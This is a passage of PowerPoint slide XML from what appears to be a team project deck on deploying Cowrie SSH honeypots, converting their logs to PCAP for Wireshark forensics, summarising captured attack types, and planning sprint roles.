            <a:endParaRPr lang="en-US" sz="850" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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18021" y="6947178"/>
            <a:ext cx="272653" cy="272653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118021" y="7356158"/>
            <a:ext cx="1363385" cy="170378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Real-time Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118021" y="7591901"/>
            <a:ext cx="4394359" cy="174427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Enables real-time threat detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="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67838" y="892869"/>
            <a:ext cx="6454496" cy="6560553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="784384"/>
            <a:ext cx="6454497" cy="814626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Wireshark Analysis: Network Traffic Capture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="1729264"/>
            <a:ext cx="6454497" cy="417195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The image displays a Wireshark capture of network traffic targeting our Cowrie honeypot on port 2222. This provides a raw, network-level view of an ongoing attack, illustrating:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="2263735"/>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SSH protocol traffic exchanged between the attacker and the honeypot.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="2517934"/>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The sequence of connection establishment and various authentication attempts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="2772132"/>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A real-time perspective on the attack's progression.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="3026331"/>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Detailed packet timing and analysis of data flow.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="3280529"/>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Identification of source IP addresses and observed connection patterns.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="3619381"/>
            <a:ext cx="4417695" cy="244316"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Why Converting JSON Logs to PCAP is Valuable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="3993952"/>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Network forensics teams prefer Wireshark for in-depth analysis due to its comprehensive capabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="4248150"/>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Provides a visual timeline of network events, simplifying incident reconstruction.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="4502348"/>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Enables protocol-level analysis, revealing low-level attack vectors and anomalies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="4756547"/>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Facilitates integration with existing network security tools and workflows.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="5010745"/>
            <a:ext cx="6454497" cy="20859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Allows for crucial correlation with other network traffic for broader context.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="5349597"/>
            <a:ext cx="2975372" cy="244316"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Benefits of Dual Format Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="5724168"/>
            <a:ext cx="6454497" cy="417195"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>JSON:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> Ideal for automated analysis, log aggregation, and seamless integration with Security Information and Event Management (SIEM) systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="6186964"/>
            <a:ext cx="6454497" cy="417195"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PCAP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> Essential for deep network forensics, manual investigation, and understanding granular network interactions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="6649760"/>
            <a:ext cx="6454497" cy="417195"/>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Enables complete attack reconstruction from both application-level (JSON) and network-level (PCAP) perspectives.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481768" y="7112556"/>
            <a:ext cx="6454497" cy="417195"/>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Serves as an invaluable training tool for network security analysts to understand real-world attack patterns.</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87003"/>
            <a:ext cx="4449008" cy="531614"/>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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What We've Captured</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="1658779"/>
            <a:ext cx="680442" cy="1020723"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 360022"/>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6435" y="2041565"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644253" y="1828800"/>
            <a:ext cx="3301246"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Login attempts from 6 countries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2849523"/>
            <a:ext cx="680442" cy="1020723"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 360022"/>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435" y="3232309"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644253" y="3019544"/>
            <a:ext cx="2916317"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Malware download attempts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4040267"/>
            <a:ext cx="680442" cy="1020723"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 360022"/>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435" y="4423053"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644253" y="4210288"/>
            <a:ext cx="2740223"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Credential stuffing attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5231011"/>
            <a:ext cx="680442" cy="1020723"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 360022"/>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6435" y="5613797"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644253" y="5401032"/>
            <a:ext cx="2865953"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Reconnaissance commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6421755"/>
            <a:ext cx="680442" cy="1020723"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 360022"/>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6435" y="6804541"/>
            <a:ext cx="255151" cy="255151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644253" y="6591776"/>
            <a:ext cx="2408039"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Persistence techniques</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846064"/>
            <a:ext cx="711731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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Team Roles &amp; Sprint Goals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3008471"/>
            <a:ext cx="6407944" cy="3374946"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10081"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="30480">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824270" y="3038951"/>
            <a:ext cx="6346984" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 44628"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="2032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7621" y="3205163"/>
            <a:ext cx="340162" cy="340162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051084" y="3946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SPRINT 1 (Week 1-2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051084" y="4436626"/>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Everyone: Deploy personal EC2 Cowrie instance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051084" y="4878824"/>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Everyone: Configure SSH access and test honeypot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051084" y="5321022"/>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Everyone: Set up Discord monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428548" y="3008471"/>
            <a:ext cx="6408063" cy="3374946"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10081"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="30480">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7459027" y="3038951"/>
            <a:ext cx="6347103" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 44628"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>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2498" y="3205163"/>
            <a:ext cx="340162" cy="340162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7685842" y="3946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SPRINT 2 (Week 3-4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7685842" y="4436626"/>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Analyst: PCAP analysis and network forensics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7685842" y="4878824"/>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DevOps: Automate deployment with Terraform</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7685842" y="5321022"/>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Security: Implement behavioral analytics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7685842" y="5763220"/>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EFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Research: Document attack patterns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792718"/>
            <a:ext cx="10564535" cy="496133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Security Analyst - Network Forensics &amp; Attack Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="31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606391"/>
            <a:ext cx="396835" cy="396835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790"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Primary Focus</a:t>
            </a:r>
